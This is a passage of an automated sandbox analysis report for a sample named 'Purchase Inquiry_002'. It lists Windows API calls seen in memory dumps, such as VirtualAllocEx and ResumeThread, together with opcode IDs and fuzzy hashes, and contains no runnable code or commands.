                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0281D6D7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 049a65c9ebbec5ce2e1699cd993450f86392f6d08c60f1080cc5c7a70c233e00
                                • Instruction ID: 2acd1c98dfa2b33782f46afec8dd92391975b427c74de614beb36b56b7a37040
                                • Opcode Fuzzy Hash: 049a65c9ebbec5ce2e1699cd993450f86392f6d08c60f1080cc5c7a70c233e00
                                • Instruction Fuzzy Hash: 9921E3B9900209DFDB10CF9AD580BDEBBF5EB48314F14841AE958A7251C374A954CF64
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D90FF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: e4d58622ca6ec65ea5548af88f7c7037a944f457face6352f77b6a00226a3a5b
                                • Instruction ID: 17fe6debe347b2df06e0218bdd802d4c0ef88a5664f5b3cae507ecb2e8d4114b
                                • Opcode Fuzzy Hash: e4d58622ca6ec65ea5548af88f7c7037a944f457face6352f77b6a00226a3a5b
                                • Instruction Fuzzy Hash: 772167768003499FDB20DFAAC844BDEBBF5EF48320F248819E529A7250C775A954CFA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: fad10a42f2aeb75d88b5518542fa7882b15afd5eaa1efb69e39fcf7b3b2ba5bb
                                • Instruction ID: c1b2d3578812e04d6c77b7f08fbb23e75ffd275f5e1221415dc44a0769f0c8d6
                                • Opcode Fuzzy Hash: fad10a42f2aeb75d88b5518542fa7882b15afd5eaa1efb69e39fcf7b3b2ba5bb
                                • Instruction Fuzzy Hash: A4E18078E00218CFDB90DFA9D880A9DBBF2FB49214F2485AAD819E7345D7319A85CF50
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D90FF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 8bab2299e976e077e2377b15890009055f2d72ce505e38e01e68b6a3b50a3d93
                                • Instruction ID: d3850b38e4836e91e933505b1fb744b0a3794fe40e78ed00cebac600d392c381
                                • Opcode Fuzzy Hash: 8bab2299e976e077e2377b15890009055f2d72ce505e38e01e68b6a3b50a3d93
                                • Instruction Fuzzy Hash: 3A1126769003499FDF20DFAAC844BDEBBF5EF48320F248419E529A7250C775A950CBA0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 604ca1df2060a57e74f781d3d8cfb640928e967ccccbb96bb34c86ef6ccff677
                                • Instruction ID: da9405651c0b1e7bc066b17e6e6bb69949bf7624bfe85a1d895670aad8f23e3b
                                • Opcode Fuzzy Hash: 604ca1df2060a57e74f781d3d8cfb640928e967ccccbb96bb34c86ef6ccff677
                                • Instruction Fuzzy Hash: 3C1146B5D003488FDB20DFAAD8457EFFBF5EF88220F248419D419A7250CB796941CBA4
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 1cd88b2e5678b08e357af93c4c20c77f4201efc02c26b2e2f1e892c7e7fa6a17
                                • Instruction ID: 0e877d1b051e655e548bb8b74617649c1ec0e749970685ec8cc18f9b012f8e83
                                • Opcode Fuzzy Hash: 1cd88b2e5678b08e357af93c4c20c77f4201efc02c26b2e2f1e892c7e7fa6a17
                                • Instruction Fuzzy Hash: 631136B1D003488FDB24DFAAD4447EEFBF5EF88220F248419D419A7250CB79A944CBA4
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 06D955F5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: de732b669dd70ca7636961a1f55aafe955ea63a03ff6c3e1e93dfd0e2215fbe6
                                • Instruction ID: 89edd1a36d0e3bef50b52f363b4918f02a003d9264b74715be86848395323de5
                                • Opcode Fuzzy Hash: de732b669dd70ca7636961a1f55aafe955ea63a03ff6c3e1e93dfd0e2215fbe6
                                • Instruction Fuzzy Hash: BE1113B58003499FDB20DF9AD444BDEBBF8EB48310F208819D958A7211C375A584CFA5
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0281AFBE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 9521466974a6a2fbe81869cbb915d1f3facb91f2471b21a5e88dd55d1d999b92
                                • Instruction ID: f9e4587740f0f6448af2b9d737c6ddd79bcdd85f210f5485b6fc14edc5550945
                                • Opcode Fuzzy Hash: 9521466974a6a2fbe81869cbb915d1f3facb91f2471b21a5e88dd55d1d999b92
                                • Instruction Fuzzy Hash: AB1113BAC003498FCB14CF9AD444BDEFBF9EB88224F10841AD429A7650C375A545CFA1
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 06D955F5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 77d7bef9148f1b28ca2b67a36917c4a841b1267fb92cedcba75e6f286614ece6
                                • Instruction ID: 875ac083f0e4aa2fa23eb2849d564b5579e22a51280057e4787d2b79d2673218
                                • Opcode Fuzzy Hash: 77d7bef9148f1b28ca2b67a36917c4a841b1267fb92cedcba75e6f286614ece6
                                • Instruction Fuzzy Hash: F411E5B5800349DFDB20DF9AD945BDEFBF8EB48310F108419D958A7610C375A944CFA5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID: m
                                • API String ID: 0-3775001192
                                • Opcode ID: 2b5bc060ddc7eb844e2022fec283a982412a19207dab677e41b53c7275c286aa
                                • Instruction ID: b0c58be988692b8ffaf0fa30c602af8c153d75f9c74b0c48d9479de7cd48a42e
                                • Opcode Fuzzy Hash: 2b5bc060ddc7eb844e2022fec283a982412a19207dab677e41b53c7275c286aa
                                • Instruction Fuzzy Hash: 4CE08C70D0420C9FDB84FFA8D44826D7BB8E788300F2101A9C44553240DB714A44CAA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6
                                • API String ID: 0-498629140
                                • Opcode ID: 4bcbe85911a0dac0f94f675bd6463c00f95fb8500816b02c2d79ab74299bef71
                                • Instruction ID: 4f45eee11182ad7a099f46d386c93d0a5dcfd0fb11cd6042f4e4c92c0cc8f5cd
                                • Opcode Fuzzy Hash: 4bcbe85911a0dac0f94f675bd6463c00f95fb8500816b02c2d79ab74299bef71
                                • Instruction Fuzzy Hash: 16E08C70C04208EFDB50EFE0D40926EBFB8E705201F1185A9D40993240EB719E40D681
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID: 7
                                • API String ID: 0-1790921346
                                • Opcode ID: b42ddecdcdbab4450b9079534be59dc25681f855861829485798f223c919fcc2
                                • Instruction ID: 8363ba81c7077bf6a7ad12d17c5cd60c0b27976bc2fb4e88a92c4c0bf8f94fbf
                                • Opcode Fuzzy Hash: b42ddecdcdbab4450b9079534be59dc25681f855861829485798f223c919fcc2
                                • Instruction Fuzzy Hash: 13E0C230C0520CDFCB90FFF5E40A76EBBF8E744204F5101A9C40A53240E7744A44C691
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9280e9cba90c410afcc51ec5dc9f0cba5f8238e9d6f5c25140925a7388ede6ee
                                • Instruction ID: dd8446946d68337ef593dcbfb5aca53223253417c9bb6e8332e1ae6a91705f7c
                                • Opcode Fuzzy Hash: 9280e9cba90c410afcc51ec5dc9f0cba5f8238e9d6f5c25140925a7388ede6ee
                                • Instruction Fuzzy Hash: BCE1AC30B102158FDB99EFB9C85866E7BFAAF89701B254469E406EB361DE70CD41CBD0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f40fbcc214964ecbc3927b648d66f0b5246b6a93343d0d4c887418a288a25d5e
                                • Instruction ID: 225d7a0b71eb48a7d7716ecf11ec9c2c6f599e9d710abdbac7364204b93867e8
                                • Opcode Fuzzy Hash: f40fbcc214964ecbc3927b648d66f0b5246b6a93343d0d4c887418a288a25d5e
                                • Instruction Fuzzy Hash: 8E91E574E042089FDB55DFE9C4846AEBBF2EF89710F20856AE819EB345D7359902CF40
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 85f927b5cc24c3016836e29ba0719ca6ba2412f8cac15aeb2b40f52d9bec3191
                                • Instruction ID: e6ae930a54b0dbaaca25477bc85d4406d4a91faf0a8a479c0aab3bdf29e56a82
                                • Opcode Fuzzy Hash: 85f927b5cc24c3016836e29ba0719ca6ba2412f8cac15aeb2b40f52d9bec3191
                                • Instruction Fuzzy Hash: 4B81B174E042598FDF51DFA8C884AAEBBB2EF49314F1084A9E809EB305E731D946CF40
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f267d72c8c8e33dab1fc9c9014230ea091fcf4249ae5dfabccd0e3cea1e8279a
                                • Instruction ID: 694fa12a658f0ad402de09eb107ac23156c4f5963187174120d97e8ee6a417e5
                                • Opcode Fuzzy Hash: f267d72c8c8e33dab1fc9c9014230ea091fcf4249ae5dfabccd0e3cea1e8279a
                                • Instruction Fuzzy Hash: D0619E78E042188FDB50DFA9C984AADFBF1BF49300F6495A9E819E7306D734A941DF50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3d1703c035e8805098f80b7e22692754f2f8c8a8f425ad86e1f89ece3ec5c6d6
                                • Instruction ID: 6b974f2555a14ff9c162dd405fc827c5738c16ce1a97c0ae766dd7eeb5702e80
                                • Opcode Fuzzy Hash: 3d1703c035e8805098f80b7e22692754f2f8c8a8f425ad86e1f89ece3ec5c6d6
                                • Instruction Fuzzy Hash: 7751E674E05208CFDB45DFE9C884AAEBBB6AF89300F14902AE819AB355DB349945CF50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fd6420bbb0fad17363a607e30c98a335ee75c1a09af0d8ab21a91021c6b50f2f
                                • Instruction ID: 12b9f73366dd90a3e98ae6b227128afc55cc444301cebbae47f6fcfee8a88d8e
                                • Opcode Fuzzy Hash: fd6420bbb0fad17363a607e30c98a335ee75c1a09af0d8ab21a91021c6b50f2f
                                • Instruction Fuzzy Hash: E251D435B102058FCB41EB799C889BFBBF7EFC52107148569E465DB391DB309C068B61
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1701cd5d654f6fbccb7f43462db5ceb633911b1aacb67c9199e193032f13a3b5
                                • Instruction ID: 3b803316eaa10a0c135a48144d58f191ce944706726f5cb7dc04fd2427dadbdd
                                • Opcode Fuzzy Hash: 1701cd5d654f6fbccb7f43462db5ceb633911b1aacb67c9199e193032f13a3b5
                                • Instruction Fuzzy Hash: 2851A574E05208CFDB49DFE9D488AADBBB6FF89300F14902AE919AB355DB319845CF50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: adca8e1c8e5d69235696b65fa745689eed9a30d4c6b1271533ef512d45e0341e
                                • Instruction ID: 5da46ebee6c71cecbf5ca90fdab5b9e278c5fe4ff7bd3b0bb8ece4986652c649
                                • Opcode Fuzzy Hash: adca8e1c8e5d69235696b65fa745689eed9a30d4c6b1271533ef512d45e0341e
                                • Instruction Fuzzy Hash: FF41E878E00208DFDB44EFA9D884AAEB7F6EB89310F54856AD815E7351DB359D02CF90
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a794f3221248c56583453331743a9a3cf95f88a1720c782c30e06f89133c4fe6
                                • Instruction ID: 8f56a2cd41b9c8a2bb741f55ae80fa8c6245d84c863f8466c49ca448bf45598f
                                • Opcode Fuzzy Hash: a794f3221248c56583453331743a9a3cf95f88a1720c782c30e06f89133c4fe6
                                • Instruction Fuzzy Hash: 2F410874E00208DFDB44EFA8D884AAEB7B2EB89310F54886AD815EB350DB35DD06CB50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 036ecba6caf4bc2359408ff210b3e0afa8c49a92603767d541a6fc5e77da87f4
                                • Instruction ID: 45f5464f0d93f31c7e1c0c70360d7fcdc3b52750a220f8c4c8a0a9caf35ed2f4
                                • Opcode Fuzzy Hash: 036ecba6caf4bc2359408ff210b3e0afa8c49a92603767d541a6fc5e77da87f4
                                • Instruction Fuzzy Hash: D241E874E00209DFDB44EFA8D4949AEBBF2FB89300F10846AE819A7354DB319D42CF94
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 40ce815ed392abe67fb258c726671921d41995a454ecd5bdfd8f08b73eea0b0a
                                • Instruction ID: f0dd4b47c6fe054ba26120edc2b98b5474b558057d0e469ca1f0d8317239d9d6
                                • Opcode Fuzzy Hash: 40ce815ed392abe67fb258c726671921d41995a454ecd5bdfd8f08b73eea0b0a
                                • Instruction Fuzzy Hash: C2410474E1020A9FDB45DFBAD85A5AEBBF5AF49741F118429E806E7250EB30D900CF60
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d859ecc3dcea6ee714b0dc208a280625041fee2f18f186a4975ff4b024ceed57
                                • Instruction ID: dbcd7501f6fd852fa5b74f388377ec0af3463e33445d31f1f08cecd0234a9e2a
                                • Opcode Fuzzy Hash: d859ecc3dcea6ee714b0dc208a280625041fee2f18f186a4975ff4b024ceed57
                                • Instruction Fuzzy Hash: 13316D71900208AFCB50DFA9D888ADEBFF9EF48310F10846AE819E7210D7759945CFA0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3c298aa229ca1edaafeaea45427e928051716d2ecdf3dfd51336d90dee9295fe
                                • Instruction ID: 2f226573756b131412f3526461e930ccd12180db3143d07e0f0f560ab32da8bd
                                • Opcode Fuzzy Hash: 3c298aa229ca1edaafeaea45427e928051716d2ecdf3dfd51336d90dee9295fe
                                • Instruction Fuzzy Hash: BC412C74E002099FCB44DFA8D4949AEBBF2FB89300F1084AAE819AB354DB319D06CF54
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 74b012cc7bdabdb335e8fbda512f930793ee7e57a7a8599e07baf25ef279d941
                                • Instruction ID: ebd4ed3b35bef996ef8152760da60cd670ab497816c0da15fe43471e8449448c
                                • Opcode Fuzzy Hash: 74b012cc7bdabdb335e8fbda512f930793ee7e57a7a8599e07baf25ef279d941
                                • Instruction Fuzzy Hash: BC2126B69043500FDB42EB789C547EF7BB2EFC5120B45846AD4A5CB241EA308909C7B1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1340300848.000000000260D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0260D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_260d000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5a97c7ef5b1022954149ef9d2955f1103a0e534e17f7fe100813ad630fcfa6dc
                                • Instruction ID: aae6fd35827d5bd235ecf8d304c0c6766e2abbd0364012233183ced514ec8cc3
                                • Opcode Fuzzy Hash: 5a97c7ef5b1022954149ef9d2955f1103a0e534e17f7fe100813ad630fcfa6dc
                                • Instruction Fuzzy Hash: 9C2128B1504204DFDB0DDF54D9C0B2BBB65FB84324F24C269E90A0B396C336E456DAA2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8e04276680e2401932ab7498ac8e14cddd1145862041238236cd7c807eefe497
                                • Instruction ID: 604dc5530f181dd72a1d904e28c24fd2530ce9b19e1e7aabbe0e6b0cef6d3798
                                • Opcode Fuzzy Hash: 8e04276680e2401932ab7498ac8e14cddd1145862041238236cd7c807eefe497
                                • Instruction Fuzzy Hash: BB314FB4E1021ADFDB80DFA9D5856EEBBF4AB48314F1084AAE815F7340E7349A40CF60
                                Memory Dump Source
                                • Source File: 00000000.00000002.1340769432.000000000261D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0261D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_261d000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4507660998cf289225993302dfaa73501dbcf6b90911ba1aea4ee9e37651ce59
                                • Instruction ID: cac38bafba2f53033f577dbac889fc9f733a1ce74757699189844674afed1f87
                                • Opcode Fuzzy Hash: 4507660998cf289225993302dfaa73501dbcf6b90911ba1aea4ee9e37651ce59
                                • Instruction Fuzzy Hash: 8F213B71504344EFDB09DF14D5C0B25BBA5FB84314F28C66DDA0A4B356C336E446CB61
                                Memory Dump Source
                                • Source File: 00000000.00000002.1340769432.000000000261D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0261D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_261d000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 40b458f0b3b47990fa6730add752739479dbd215f132d77e75be9f0598e7ea2e
                                • Instruction ID: aa950fc0df7a96dcd6ab5c85625b54ac9395e018315048225f13d5ecd4d06ccc
                                • Opcode Fuzzy Hash: 40b458f0b3b47990fa6730add752739479dbd215f132d77e75be9f0598e7ea2e
                                • Instruction Fuzzy Hash: 7B21F275604384DFDB18DF14D980B26BBA5EB84315F28C56DD80A4B396C33BE847CA62
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 71bb99c09155ba0b827bcc0af85ffd1d224c30b3f8325eb8faf94a406d621a48
                                • Instruction ID: 679937b89cda0920dc981723f73160c3dc7c3737e8eb4caa97163627c5353de3
                                • Opcode Fuzzy Hash: 71bb99c09155ba0b827bcc0af85ffd1d224c30b3f8325eb8faf94a406d621a48
                                • Instruction Fuzzy Hash: 7E31E4B4C01218DFDB60DF99D989BCEBFF5AB48310F248459E404AB250C3B55885CBA1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 28dee353893137bfe7d2cbc3de8255deaddb69b6d15b710707d92dce2e49f060
                                • Instruction ID: be94a66db7ea866aa89748b34396624c74403818bd82a05261e5ef7ac79153a4
                                • Opcode Fuzzy Hash: 28dee353893137bfe7d2cbc3de8255deaddb69b6d15b710707d92dce2e49f060
                                • Instruction Fuzzy Hash: B02195B4D1124ADFCB41DFA9C9456EEBBF0EB49214F1085AAE814E7350E7349A41CFA1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c5af285ce5e3934e3f54bc3f1bd158a660edf3c4e5790958c9e8353533fe1490
                                • Instruction ID: f77d31daf3ae4afed97aee568eabf79de59f99d2fbc46d7ac1d1b577be23d9a6
                                • Opcode Fuzzy Hash: c5af285ce5e3934e3f54bc3f1bd158a660edf3c4e5790958c9e8353533fe1490
                                • Instruction Fuzzy Hash: 1C11E370B19384AFCB46EB708D598AE7FF99F4210071544E7E805CB283EA358E0AC762
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b5fe3b1c389fe0edaaac3f8d97b240aeb5220fade068597dc56210e8b72c309b
                                • Instruction ID: 062b98ff388259f717808e0e7802556d2828288e9e1ce8af192ecaafae7b8f64
                                • Opcode Fuzzy Hash: b5fe3b1c389fe0edaaac3f8d97b240aeb5220fade068597dc56210e8b72c309b
                                • Instruction Fuzzy Hash: 5531E0B4C00318DFDB60EF9AD588B9EBFF5AB48310F248059E808BB250C3B55845CFA5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a1ed61b97f18c53f204abeb3bdf53572ec0706a6d48dd30d31df31585d8e1bb4
                                • Instruction ID: 1198f78c670a078ac4c6c80600c7dff8ef070e09d33a5fdfcdbeccb8016b79a2
                                • Opcode Fuzzy Hash: a1ed61b97f18c53f204abeb3bdf53572ec0706a6d48dd30d31df31585d8e1bb4
                                • Instruction Fuzzy Hash: 9621A374E00209CFDB04DFE9C594AEDBBB6FB48311F20816AD919AB355D7316945CF90
                                Memory Dump Source
                                • Source File: 00000000.00000002.1340769432.000000000261D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0261D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_261d000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c55f022de932803afd1cd04c02ddb6ecf49d3f41a7007a4d31b5f2d84b39df08
                                • Instruction ID: 11fc56ece9d03262edc553b6e28e14f3887876fb1ba5dcd04ec731b512c38008
                                • Opcode Fuzzy Hash: c55f022de932803afd1cd04c02ddb6ecf49d3f41a7007a4d31b5f2d84b39df08
                                • Instruction Fuzzy Hash: B12181755093C08FDB12CF24D994715BF71EB46214F28C5EAD8898F6A7C33A984ACB62
                                Memory Dump Source
